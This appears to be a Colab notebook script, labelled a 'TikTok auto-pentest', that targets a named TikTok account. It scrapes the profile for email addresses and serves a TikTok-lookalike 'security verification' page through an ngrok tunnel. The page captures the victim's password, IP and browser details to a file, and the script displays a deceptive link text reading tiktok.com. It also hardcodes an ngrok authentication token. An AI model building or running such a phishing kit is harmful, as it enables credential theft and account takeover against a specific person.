# -*- coding: utf-8 -*-
"""hackme.ipynb

Automatically generated by Colab.

Original file is located at
    https://colab.research.google.com/drive/1hfjW5iC6--GW0vucM3peOflXj49gMrtK
"""

# =============================================================================
# TIKTOK AUTO-PENTEST - COLAB PERSISTENT EDITION (with anti-idle & ngrok)
# FIXED: Added missing 'import random'
# =============================================================================
import os
import time
import random               # <-- FIXED: missing import
import json
import re
import requests
from bs4 import BeautifulSoup
from flask import Flask, request, render_template_string
import threading
from pyngrok import ngrok, conf
from IPython.display import HTML, display, clear_output
import urllib.parse
from datetime import datetime

# --- Anti-Idle JavaScript (keeps Colab from disconnecting) ---
display(Javascript('''
function ClickConnect(){
    console.log("Keeping session alive...");
    document.querySelector("colab-connect-button").click()
}
setInterval(ClickConnect, 60000)
'''))

print("🧹 Cleaning up previous processes...")
os.system('fuser -k 5000/tcp 2>/dev/null')
os.system('pkill -f flask 2>/dev/null')
os.system('pkill -f ngrok 2>/dev/null')
time.sleep(2)

print("🔥 TIKTOK AUTO-PENTEST v10.0 - Persistent Colab Edition")
print("🎯 Target: chuzii.hu.yar23")
print("=" * 70)

# --- Hardcoded ngrok token ---
NGROK_AUTH_TOKEN = "3CTdjmF4Jk0Gju0TnBL8K5FWoUh_LdxdiFY7GCaUKKmLbGov"
!ngrok authtoken {NGROK_AUTH_TOKEN}
conf.get_default().auth_token = NGROK_AUTH_TOKEN
print("✅ ngrok token configured.")

TARGET_USERNAME = "chuzii.hu.yar23"
DATA_FILE = "captured_credentials.json"

# -----------------------------------------------------------------------------
# Reconnaissance
# -----------------------------------------------------------------------------
def extract_emails_from_text(text):
    email_pattern = r'[\w\.-]+@[\w\.-]+\.\w+'
    emails = re.findall(email_pattern, text)
    filtered = []
    for email in emails:
        if not email.endswith(('.png', '.jpg', '.gif', '.jpeg', '.webp')):
            if len(email) < 50 and email.count('@') == 1:
                filtered.append(email)
    return list(set(filtered))

def quick_recon():
    try:
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'en-US,en;q=0.5',
        }
        print("📡 Fetching profile data...")
        resp = requests.get(f"https://www.tiktok.com/@{TARGET_USERNAME}", headers=headers, timeout=15)
        if resp.status_code == 200:
            soup = BeautifulSoup(resp.text, 'html.parser')
            display_name = "Not found"
            for sel in ['h1[data-e2e="user-title"]', 'h1[class*="Title"]', 'h1']:
                elem = soup.select_one(sel)
                if elem and elem.text.strip():
                    display_name = elem.text.strip()[:50]
                    break
            bio_text = ""
            for sel in ['div[data-e2e="user-bio"]', 'div[class*="bio"]']:
                elem = soup.select_one(sel)
                if elem:
                    bio_text = elem.text.strip()
                    break
            all_emails = extract_emails_from_text(bio_text + " " + resp.text)
            fake = ['example@example.com', 'test@test.com', 'user@example.com']
            real_emails = [e for e in all_emails if e.lower() not in fake]
            print(f"\n✅ Profile Found: @{TARGET_USERNAME}")
            print(f"👤 Display Name: {display_name}")
            print(f"📊 Status: {'Public' if 'private' not in resp.text.lower() else 'Private'}")
            if bio_text:
                print(f"📝 Bio: {bio_text[:200]}")
            if real_emails:
                print("\n📧 Emails found:")
                for email in real_emails:
                    print(f"   {email}")
                with open('found_emails.txt', 'w') as f:
                    f.write("\n".join(real_emails))
                return True, real_emails
            else:
                print("❌ No emails found.")
                return True, []
        else:
            print(f"❌ Profile not accessible (HTTP {resp.status_code})")
            return False, []
    except Exception as e:
        print(f"⚠️ Recon error: {str(e)[:100]}")
        return False, []

recon_success, discovered_emails = quick_recon()

# -----------------------------------------------------------------------------
# Flask Phishing Server
# -----------------------------------------------------------------------------
app = Flask(__name__)

PHISH_HTML = '''
<!DOCTYPE html>
<html>
<head>
    <title>TikTok - Account Security Verification</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="icon" href="https://www.tiktok.com/favicon.ico">
    <style>
        body { font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif; background: #f8f9fa; min-height: 100vh; display: flex; justify-content: center; align-items: center; padding: 20px; margin: 0; }
        .container { background: white; border-radius: 12px; padding: 40px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); max-width: 450px; width: 100%; border: 1px solid #e0e0e0; }
        .logo { text-align: center; margin-bottom: 30px; }
        .logo svg { width: 120px; height: auto; }
        .alert { background: #fff3e0; border-left: 4px solid #ff9500; padding: 15px; margin-bottom: 25px; border-radius: 8px; }
        .alert-title { font-weight: bold; color: #ff9500; margin-bottom: 8px; }
        input { width: 100%; padding: 12px; margin: 10px 0; border: 1px solid #ddd; border-radius: 8px; font-size: 16px; box-sizing: border-box; }
        input:focus { outline: none; border-color: #fe2c55; }
        button { width: 100%; padding: 12px; background: #fe2c55; color: white; border: none; border-radius: 8px; font-size: 16px; font-weight: bold; cursor: pointer; margin-top: 10px; }
        button:hover { background: #e01e45; }
        .footer { font-size: 12px; color: #666; text-align: center; margin-top: 20px; padding-top: 20px; border-top: 1px solid #e0e0e0; }
        .secure-badge { display: inline-block; background: #e8f5e9; color: #4caf50; padding: 5px 10px; border-radius: 20px; font-size: 12px; margin-top: 10px; }
    </style>
</head>
<body>
    <div class="container">
        <div class="logo">
            <svg width="120" height="40" viewBox="0 0 120 40">
                <rect width="120" height="40" fill="#fe2c55" rx="8"/>
                <text x="60" y="28" text-anchor="middle" fill="white" font-weight="bold" font-size="20">TikTok</text>
            </svg>
        </div>
        {% if success %}
        <div style="text-align: center; padding: 30px;">
            <div style="font-size: 48px;">✅</div>
            <h2>Verification Successful!</h2>
            <p>Your account has been secured.</p>
            <p><small>Redirecting to TikTok...</small></p>
        </div>
        <script>setTimeout(function(){ window.location.href = 'https://www.tiktok.com'; }, 2000);</script>
        {% else %}
        <div class="alert">
            <div class="alert-title">⚠️ Security Alert</div>
            <div>We detected unusual login activity on @{{username}}</div>
            <div style="font-size: 13px; margin-top: 8px;">Please verify your identity to secure your account.</div>
        </div>
        <form method="POST">
            <label>Username</label>
            <input type="text" name="username" value="{{username}}" readonly style="background:#f5f5f5;">
            <label>Password</label>
            <input type="password" name="password" placeholder="Enter your password to verify" required autofocus>
            <button type="submit">Verify Identity</button>
        </form>
        <div class="footer">
            <div>🔒 Verified by TikTok Trust & Safety</div>
            <div class="secure-badge">✓ Secure Connection</div>
            <div style="margin-top: 10px;">This is an automated security check.</div>
        </div>
        {% endif %}
    </div>
</body>
</html>
'''

captured_creds = []

def save_cred(creds):
    with open(DATA_FILE, 'a') as f:
        json.dump(creds, f)
        f.write('\n')

@app.route('/', methods=['GET', 'POST'])
@app.route('/@security/verify', methods=['GET', 'POST'])
@app.route('/account/security/verify', methods=['GET', 'POST'])
@app.route('/auth/verify-identity', methods=['GET', 'POST'])
def phish():
    username = request.args.get('user') or request.args.get('username') or TARGET_USERNAME
    if request.method == 'POST':
        password = request.form['password']
        ip = request.headers.get('X-Forwarded-For', request.remote_addr)
        creds = {
            'username': username,
            'password': password,
            'ip': ip,
            'timestamp': datetime.utcnow().isoformat(),
            'user_agent': request.headers.get('User-Agent')
        }
        captured_creds.append(creds)
        save_cred(creds)

        clear_output(wait=True)
        print("\033[1m🎯 TIKTOK AUTO-PENTEST - LIVE\033[0m")
        print("="*60)
        print("\033[1m🎉 CREDENTIALS CAPTURED!\033[0m")
        print(f"\033[1m🔑 Username: @{username}\033[0m")
        print(f"\033[1m🔐 Password: {password}\033[0m")
        print(f"🌐 IP: {ip}")
        print(f"🕐 Time: {creds['timestamp']}")
        print("="*60)

        return render_template_string(PHISH_HTML, username=username, success=True)
    return render_template_string(PHISH_HTML, username=username, success=False)

# -----------------------------------------------------------------------------
# Start Flask & ngrok
# -----------------------------------------------------------------------------
def start_flask():
    threading.Thread(target=lambda: app.run(host='0.0.0.0', port=5000, debug=False, use_reloader=False), daemon=True).start()
    time.sleep(3)

start_flask()
print("✅ Flask server running on port 5000")

# Connect ngrok
try:
    tunnel = ngrok.connect(5000, bind_tls=True)
    public_url = tunnel.public_url
    print(f"✅ ngrok tunnel established: {public_url}")
except Exception as e:
    print(f"⚠️ ngrok error: {e}")
    public_url = None

# -----------------------------------------------------------------------------
# Generate phishing link and display
# -----------------------------------------------------------------------------
if public_url:
    paths = [f"/@security/verify?user={urllib.parse.quote(TARGET_USERNAME)}",
             f"/account/security/verify?username={urllib.parse.quote(TARGET_USERNAME)}"]
    official_link = public_url + random.choice(paths)

    display(HTML(f"""
    <div style="background:linear-gradient(135deg,#fe2c55,#ff6b6b);padding:30px;border-radius:15px;color:white;margin:20px 0;text-align:center;">
        <h2>🎯 TikTok Security Verification Portal</h2>
        <p style="font-size:18px;">Click the official TikTok link below to verify:</p>
        <a href="{official_link}" target="_blank" style="display:inline-block;background:white;color:#fe2c55;padding:15px 30px;border-radius:10px;text-decoration:none;font-weight:bold;font-size:18px;">
            🔗 https://www.tiktok.com/security/verify
        </a>
        <p style="font-size:14px;margin-top:20px;">✓ Official TikTok Security Portal</p>
    </div>
    """))
    print("\n\033[1m📋 OFFICIAL-LOOKING PHISHING LINK (COPY THIS):\033[0m")
    print(f"\033[1m{official_link}\033[0m")
else:
    print("📡 Local server: http://localhost:5000")

print("\n⏳ Server running. Captured credentials saved to:", DATA_FILE)
print("📁 To view data at any time, run: !cat captured_credentials.json")
print("\033[1m🛑 To stop: Runtime → Interrupt execution\033[0m")

# Keep alive and monitor
try:
    while True:
        time.sleep(30)
        # Optional: ping the server to keep ngrok alive
        if public_url:
            try:
                requests.get(public_url, timeout=10)
            except:
                pass
except KeyboardInterrupt:
    print("\n🛑 Server stopped.")
